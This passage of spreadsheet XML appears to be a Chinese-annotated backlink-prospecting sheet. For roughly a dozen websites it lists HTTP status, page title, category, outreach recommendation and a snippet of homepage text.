      </x:c>
      <x:c r="M483" s="19" t="str">
        <x:v>https://itsallyouboo.com/</x:v>
      </x:c>
      <x:c r="N483" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O483" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P483" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q483" s="21" t="str">
        <x:v>It's All You Boo Skip to content Home Start Here Goal Setting Take Action Mental Health Live Better Change Your Mindset Manage Your Money Be Your Own Boss Quotes &amp; Sayings Blog Book About Contact Take the Quiz It’s All You Boo Take control of your mind, time, &amp; energy. It’s time to start living a life you love with confidence &amp; action. Quotes &amp; Sayings 87 Hello September Quotes to Welcome the First Month of Fall Looking for a good quote about September? Looking for September quotes to celebrate the most exciting month of the year?… Read More 87 Hello September Quotes to Welcome the First Month of Fall Popular Articles Quotes &amp; Sayings 130 Beautiful Libra Quotes for the Balanced Scales of the</x:v>
      </x:c>
      <x:c r="R483" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S483" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T483" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://itsallyouboo.com</x:v>
      </x:c>
    </x:row>
    <x:row r="484">
      <x:c r="A484" s="18" t="str">
        <x:v>483</x:v>
      </x:c>
      <x:c r="B484" s="19" t="str">
        <x:v>artera.io</x:v>
      </x:c>
      <x:c r="C484" s="19" t="str">
        <x:v>https://artera.io</x:v>
      </x:c>
      <x:c r="D484" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E484" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F484" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G484" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H484" s="19" t="str">
        <x:v>https://artera.io/</x:v>
      </x:c>
      <x:c r="I484" s="19" t="str">
        <x:v>AI Agents for Healthcare | Patient Communication Platform</x:v>
      </x:c>
      <x:c r="J484" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K484" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L484" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M484" s="19" t="str">
        <x:v>https://artera.io/</x:v>
      </x:c>
      <x:c r="N484" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O484" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P484" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q484" s="21" t="str">
        <x:v>Manual outreach drains millions in revenue annually. AI Service Squads automate calls, intake, scheduling, and payments across every EHR. AI Agents for Healthcare | Patient Communication Platform Skip to content Platform Agentic Platform Overview Channels: Voice, Rich Text, Email Benefits AI Service Squads Why Squads How They Work What They Do AI Solutions Scheduling Intake &amp; Payments Referrals Care Gap Closure Custom Solutions Why Artera EHR Integrations Marketplace Security Customers Healthcare Providers FQHCs &amp; CHCs Health Systems Federal Agencies Overview Product Contact Specialty Care Behavioral Health Cardiology Dermatology Primary Care Gastroenterology Oncology Ophthalmology Optometry Orthopedics Otolaryngology (ENT) Pediatrics Urology Women’s Health Resources Customer Stories FQHC &amp; CHCs Specialty Care Health Systems K</x:v>
      </x:c>
      <x:c r="R484" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S484" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T484" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://artera.io</x:v>
      </x:c>
    </x:row>
    <x:row r="485">
      <x:c r="A485" s="18" t="str">
        <x:v>484</x:v>
      </x:c>
      <x:c r="B485" s="19" t="str">
        <x:v>mara.biz</x:v>
      </x:c>
      <x:c r="C485" s="19" t="str">
        <x:v>https://mara.biz</x:v>
      </x:c>
      <x:c r="D485" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E485" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F485" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G485" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H485" s="19" t="str">
        <x:v>http://mara.biz/</x:v>
      </x:c>
      <x:c r="I485" s="19" t="str">
        <x:v>Welkom - MARA.biz</x:v>
      </x:c>
      <x:c r="J485" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K485" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L485" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M485" s="19" t="str">
        <x:v>http://mara.biz/</x:v>
      </x:c>
      <x:c r="N485" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O485" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P485" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q485" s="21" t="str">
        <x:v>Welkom - MARA.biz Skip to content MARA.biz Make Art Really Amazing Welkom Schminken Bellypaints Muurschilderingen Airbrush tattoo’s Special effects en Grime Contact Welkom « ‹ of 34 › » Welkom bij Make Art Really Amazing. Voor schminken en nog veel meer… Laten we er samen een kleurrijkfeestje van maken! Schminken en airbrushtattoo’s Bij Make Art Really Amazing is van alles mogelijk op schminkgebied. De mooiste creaties worden op vrolijke kindergezichten getoverd. Maar ook stoere (nep) tattoo’s zijn leuk om eens uit te proberen. Kinderen schminken doen we op evenementen, open dagen en (kinder)feestjes in elk gewenst thema. We kunnen dit eventueel uitbreiden met glittertattoo’s, airbrushtattoo</x:v>
      </x:c>
      <x:c r="R485" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S485" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T485" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mara.biz
http://mara.biz</x:v>
      </x:c>
    </x:row>
    <x:row r="486">
      <x:c r="A486" s="18" t="str">
        <x:v>485</x:v>
      </x:c>
      <x:c r="B486" s="19" t="str">
        <x:v>sixthbloom.com</x:v>
      </x:c>
      <x:c r="C486" s="19" t="str">
        <x:v>https://sixthbloom.com</x:v>
      </x:c>
      <x:c r="D486" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E486" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F486" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G486" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H486" s="19" t="str">
        <x:v>https://www.sixthbloom.com/</x:v>
      </x:c>
      <x:c r="I486" s="19" t="str">
        <x:v>Sixth Bloom -</x:v>
      </x:c>
      <x:c r="J486" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K486" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L486" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M486" s="19" t="str">
        <x:v>https://www.sixthbloom.com/</x:v>
      </x:c>
      <x:c r="N486" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O486" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P486" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q486" s="21" t="str">
        <x:v>Sixth Bloom - Sixth Bloom Photography Tips Start Here Photography Courses Edit Pictures Like a Pro Grow Your Business Learn Your Camera Childrens Photography Tips Family Photography Tips Newborn Photography Tips Senior Photography Tips Wedding Photography Tips Photography Projects Recipes Appetizers Breakfast Desserts Food Instant Pot Meals Snacks Kids Activities &amp; Crafts Family Gardening Tips Travel Money Saving &amp; Budgeting Home &amp; Lifestyle Our Family Life Decor &amp; DIY About Me Featured On Privacy Policy Contact Me Guest Post Application The Complete Guide of Traveling with Children September 27, 2021 By Sixth-Bloom Leave a Comment How to Pull Off a Proper Trip with Your Children Everyone lo</x:v>
      </x:c>
      <x:c r="R486" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S486" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T486" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sixthbloom.com</x:v>
      </x:c>
    </x:row>
    <x:row r="487">
      <x:c r="A487" s="18" t="str">
        <x:v>486</x:v>
      </x:c>
      <x:c r="B487" s="19" t="str">
        <x:v>canva.site</x:v>
      </x:c>
      <x:c r="C487" s="19" t="str">
        <x:v>https://canva.site</x:v>
      </x:c>
      <x:c r="D487" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E487" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F487" s="20" t="str">
        <x:v>404</x:v>
      </x:c>
      <x:c r="G487" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H487" s="19" t="str">
        <x:v>https://canva.site/</x:v>
      </x:c>
      <x:c r="I487" s="19" t="str">
        <x:v>Not found</x:v>
      </x:c>
      <x:c r="J487" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K487" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L487" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M487" s="19" t="str">
        <x:v>https://canva.site/</x:v>
      </x:c>
      <x:c r="N487" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O487" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P487" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q487" s="21" t="str">
        <x:v>Not found Not found (404) That means the page you’re looking for doesn’t exist.</x:v>
      </x:c>
      <x:c r="R487" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S487" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T487" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://canva.site</x:v>
      </x:c>
    </x:row>
    <x:row r="488">
      <x:c r="A488" s="18" t="str">
        <x:v>487</x:v>
      </x:c>
      <x:c r="B488" s="19" t="str">
        <x:v>plannerjam.com</x:v>
      </x:c>
      <x:c r="C488" s="19" t="str">
        <x:v>https://plannerjam.com</x:v>
      </x:c>
      <x:c r="D488" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E488" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F488" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G488" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H488" s="19" t="str">
        <x:v>https://www.plannerjam.com/</x:v>
      </x:c>
      <x:c r="I488" s="19" t="str">
        <x:v>Planner Jam – Tools and Resources for Bullet Journaling and Planning</x:v>
      </x:c>
      <x:c r="J488" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K488" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L488" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M488" s="19" t="str">
        <x:v>https://www.plannerjam.com/</x:v>
      </x:c>
      <x:c r="N488" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O488" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P488" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q488" s="21" t="str">
        <x:v>Discover bullet journaling and planner inspiration, tips, and resources to help you stay organized and creative. Planner Jam – Tools and Resources for Bullet Journaling and Planning Blog Freebies Free Tools About Contact Check out our latest blogs April 21, 2025 80 Discipline Quotes to Inspire Success in Every Aspect of Life April 19, 2025 Friday Motivational Quotes to Inspire Your Weekend April 18, 2025 New Month, New Goals: How to Set and Achieve Your Monthly Objectives April 13, 2025 How to Draw A Sunflower Step by Step (Easy for Beginners) View all Blogs Copyright © 2026 Planner Jam . All rights reserved. Planner Jam participate in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to</x:v>
      </x:c>
      <x:c r="R488" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S488" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T488" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://plannerjam.com</x:v>
      </x:c>
    </x:row>
    <x:row r="489">
      <x:c r="A489" s="18" t="str">
        <x:v>488</x:v>
      </x:c>
      <x:c r="B489" s="19" t="str">
        <x:v>msmomfixit.com</x:v>
      </x:c>
      <x:c r="C489" s="19" t="str">
        <x:v>https://msmomfixit.com</x:v>
      </x:c>
      <x:c r="D489" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E489" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F489" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G489" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H489" s="19" t="str">
        <x:v>https://msmomfixit.com/</x:v>
      </x:c>
      <x:c r="I489" s="19" t="str">
        <x:v>Ms Mom Fix It – Cents-able Solutions for Daily Life</x:v>
      </x:c>
      <x:c r="J489" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K489" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L489" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M489" s="19" t="str">
        <x:v>https://msmomfixit.com/</x:v>
      </x:c>
      <x:c r="N489" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O489" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P489" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q489" s="21" t="str">
        <x:v>Cents-able Solutions for Daily Life Ms Mom Fix It – Cents-able Solutions for Daily Life Skip to primary navigation Skip to main content Skip to primary sidebar Ms Mom Fix It Cents-able Solutions for Daily Life About Privacy Policy Crafts Costumes Kids and Simple Crafts Recycled / Upcycled DIY Sewing Machine Basics | Beginner Autism For Home Essential Oils Recipes Money Miscellaneous Library Resource Library Search All You Need To Know To Fix Waist Gap Let’s be real for a moment. If you are a woman, you have undoubtedly experienced the dreaded waist gap (or back gap). Today, I’m going to show you the simple method I use to fix waist gap. This method takes very little skill. I promise! This post may contain some affiliate links </x:v>
      </x:c>
      <x:c r="R489" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S489" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T489" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://msmomfixit.com</x:v>
      </x:c>
    </x:row>
    <x:row r="490">
      <x:c r="A490" s="18" t="str">
        <x:v>489</x:v>
      </x:c>
      <x:c r="B490" s="19" t="str">
        <x:v>lecf.ca</x:v>
      </x:c>
      <x:c r="C490" s="19" t="str">
        <x:v>https://lecf.ca</x:v>
      </x:c>
      <x:c r="D490" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E490" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F490" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G490" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H490" s="19" t="str">
        <x:v>https://lecf.ca/</x:v>
      </x:c>
      <x:c r="I490" s="19" t="str">
        <x:v>L'excellence - L’Excellence Conseils &amp; Formation œuvre pour soutenir l’entrepreneuriat au Québec</x:v>
      </x:c>
      <x:c r="J490" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K490" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L490" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M490" s="19" t="str">
        <x:v>https://lecf.ca/</x:v>
      </x:c>
      <x:c r="N490" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O490" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P490" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q490" s="21" t="str">
        <x:v>L’Excellence Conseils &amp; Formation œuvre pour soutenir l’entrepreneuriat au Québec L'excellence - L’Excellence Conseils &amp; Formation œuvre pour soutenir l’entrepreneuriat au Québec Accueil Formations Étudiants Internationaux Aide Financière Aide à l'emploi Nous joindre BIENVENUE AU CANADA Votre réussite est notre seule préoccupation Notre mission Avec plus de 14 ans d'expérience dans le domaine de la formation et de l’emploi, L'Excellence s'engage à être votre partenaire de confiance pour la réalisation de vos projets d'études et de carrière au Canada. Notre mission est de vous offrir des conseils personnalisés et des ressources adaptées à votre situation, afin de vous aider à atteindre vos objectifs professionnels et personnels. Que vous souhaitiez poursuivre des études, t</x:v>
      </x:c>
      <x:c r="R490" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S490" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T490" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://lecf.ca</x:v>
      </x:c>
    </x:row>
    <x:row r="491">
      <x:c r="A491" s="18" t="str">
        <x:v>490</x:v>
      </x:c>
      <x:c r="B491" s="19" t="str">
        <x:v>sacredheartstmichael.com</x:v>
      </x:c>
      <x:c r="C491" s="19" t="str">
        <x:v>https://sacredheartstmichael.com</x:v>
      </x:c>
      <x:c r="D491" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E491" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F491" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G491" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H491" s="19" t="str">
        <x:v>https://sacredheartcc.com/</x:v>
      </x:c>
      <x:c r="I491" s="19" t="str">
        <x:v>Sacred Heart Catholic Church</x:v>
      </x:c>
      <x:c r="J491" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K491" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L491" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M491" s="19" t="str">
        <x:v>https://sacredheartcc.com/</x:v>
      </x:c>
      <x:c r="N491" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O491" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P491" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q491" s="21" t="str">
        <x:v>Sacred Heart Catholic Church Skip to content Sacred Heart Catholic Church Welcome Our History Sacraments Anointing of the Sick Baptism Confirmation Eucharist Holy Matrimony Holy Orders Reconciliation Ministries Census Form Bulletins Sacred Heart Catholic Church Anointing of the Sick Baptism Census Form Confirmation Eucharist Holy Matrimony Holy Orders Ministries Our History Reconciliation Sacraments Welcome Welcome Online Giving Click on the Pushpay icon to be redirected to the online giving site or scan the QR code with your smartphone Mass Times Thursday Daily Mass: 8 am Saturday Vigil Mass: 4 pm Office 206 N. Pine Street, Villa Grove, IL 61956 (217) 832-8352 villagrove.hume@gmail.com Mond</x:v>
      </x:c>
      <x:c r="R491" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S491" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T491" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://sacredheartstmichael.com</x:v>
      </x:c>
    </x:row>
    <x:row r="492">
      <x:c r="A492" s="18" t="str">
        <x:v>491</x:v>
      </x:c>
      <x:c r="B492" s="19" t="str">
        <x:v>travelaway.cl</x:v>
      </x:c>
      <x:c r="C492" s="19" t="str">
        <x:v>https://travelaway.cl</x:v>
      </x:c>
      <x:c r="D492" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E492" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F492" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G492" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H492" s="19" t="str">
        <x:v>https://travelaway.cl/</x:v>
      </x:c>
      <x:c r="I492" s="19" t="str"/>
      <x:c r="J492" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K492" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L492" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M492" s="19" t="str">
        <x:v>https://travelaway.cl/</x:v>
      </x:c>
      <x:c r="N492" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O492" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P492" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q492" s="21" t="str"/>
      <x:c r="R492" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S492" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T492" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://travelaway.cl</x:v>
      </x:c>
    </x:row>
    <x:row r="493">
      <x:c r="A493" s="18" t="str">
        <x:v>492</x:v>
      </x:c>
      <x:c r="B493" s="19" t="str">
        <x:v>justbeetit.com</x:v>
      </x:c>
      <x:c r="C493" s="19" t="str">
        <x:v>https://justbeetit.com</x:v>
      </x:c>
      <x:c r="D493" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E493" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F493" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G493" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H493" s="19" t="str">
        <x:v>https://www.justbeetit.com/</x:v>
      </x:c>
      <x:c r="I493" s="19" t="str">
        <x:v>Just Beet It</x:v>
      </x:c>
      <x:c r="J493" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K493" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L493" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M493" s="19" t="str">
        <x:v>https://www.justbeetit.com/</x:v>
      </x:c>
      <x:c r="N493" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O493" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P493" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q493" s="21" t="str">
        <x:v>We celebrate the extraordinary and humble beet by featuring beet nutrition, beet history, beet recipes, and beet-themed articles. Just Beet It instagram-unauth pinterest-unauth facebook-unauth Home About Blog Blog Topics Latest Posts Meet The Beet Do-It-Yourself Nutrition &amp; Wellness Recipe Collections Tasty Tuesdays Recipes Recipe Categories Latest Recipes Juices &amp; Smoothies Snacks &amp; Sides Salads &amp; Soups Main Dishes Desserts Cocktails &amp; Mocktails Nutrition Beet Nutrition History of the Beet Contact Contact Write For Us Submit Recipes Submission Guidelines Home About Blog Topics Latest Posts Meet The Beet Do-It-Yourself Nutrition &amp; Wellness Recipe Collections Tasty Tuesdays Recipe Categories Latest Recipes Juices &amp; Smoothies Snacks &amp; Sides Salads &amp; Soups Main Dishes Desserts Cocktails &amp; Mocktails Beet Nutrition History </x:v>
      </x:c>
      <x:c r="R493" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S493" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T493" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://justbeetit.com</x:v>
      </x:c>
    </x:row>
    <x:row r="494">
      <x:c r="A494" s="18" t="str">
        <x:v>493</x:v>
      </x:c>
      <x:c r="B494" s="19" t="str">
        <x:v>martinek.sk</x:v>
      </x:c>
      <x:c r="C494" s="19" t="str">
        <x:v>https://martinek.sk</x:v>
      </x:c>
      <x:c r="D494" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E494" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F494" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G494" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H494" s="19" t="str">
        <x:v>https://www.marekmartinek.sk/</x:v>
      </x:c>
      <x:c r="I494" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J494" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K494" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L494" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M494" s="19" t="str">
        <x:v>https://www.marekmartinek.sk/</x:v>
      </x:c>
      <x:c r="N494" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O494" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P494" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q494" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R494" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S494" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T494" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://martinek.sk
http://martinek.sk</x:v>
      </x:c>
    </x:row>
    <x:row r="495">
      <x:c r="A495" s="18" t="str">
        <x:v>494</x:v>
      </x:c>
      <x:c r="B495" s="19" t="str">
        <x:v>readysetsensory.com</x:v>
      </x:c>
      <x:c r="C495" s="19" t="str">
        <x:v>https://readysetsensory.com</x:v>
      </x:c>
      <x:c r="D495" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E495" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F495" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G495" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H495" s="19" t="str">
        <x:v>https://readysetsensory.com/</x:v>
      </x:c>
      <x:c r="I495" s="19" t="str">
        <x:v>Home - Ready Set Sensory</x:v>
      </x:c>
      <x:c r="J495" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K495" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L495" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M495" s="19" t="str">
        <x:v>https://readysetsensory.com/</x:v>
      </x:c>
      <x:c r="N495" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O495" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P495" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q495" s="21" t="str">
        <x:v>Fun and easy sensory play ideas and DIY sensory bins great for toddlers, preschoolers, and kindergarteners. Home - Ready Set Sensory Skip to content Are you ready for sensory fun?! Home Sensory Play Fine Motor Activities Learn Through Play Blog easy sensory activities for toddlers, preschoolers, and beyond See all the latest find new Sensory Bin Ideas explore Sensory Activities make Sensory Play Recipes Browse Seasonal Sensory Ideas Easy Sensory Activities and Ideas for Kids Sensory play is one of the best ways to support early learning, fine motor skills, independence, and creativity. Here you’ll find simple sensory bin setups, themed activities, calm-down ideas, and hands-on play prompts that work for toddlers, preschoolers, and early elementary kids. Everything is designed to be low-prep, affor</x:v>
      </x:c>
      <x:c r="R495" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S495" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T495" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://readysetsensory.com</x:v>
      </x:c>
    </x:row>
    <x:row r="496">
      <x:c r="A496" s="18" t="str">
        <x:v>495</x:v>
      </x:c>
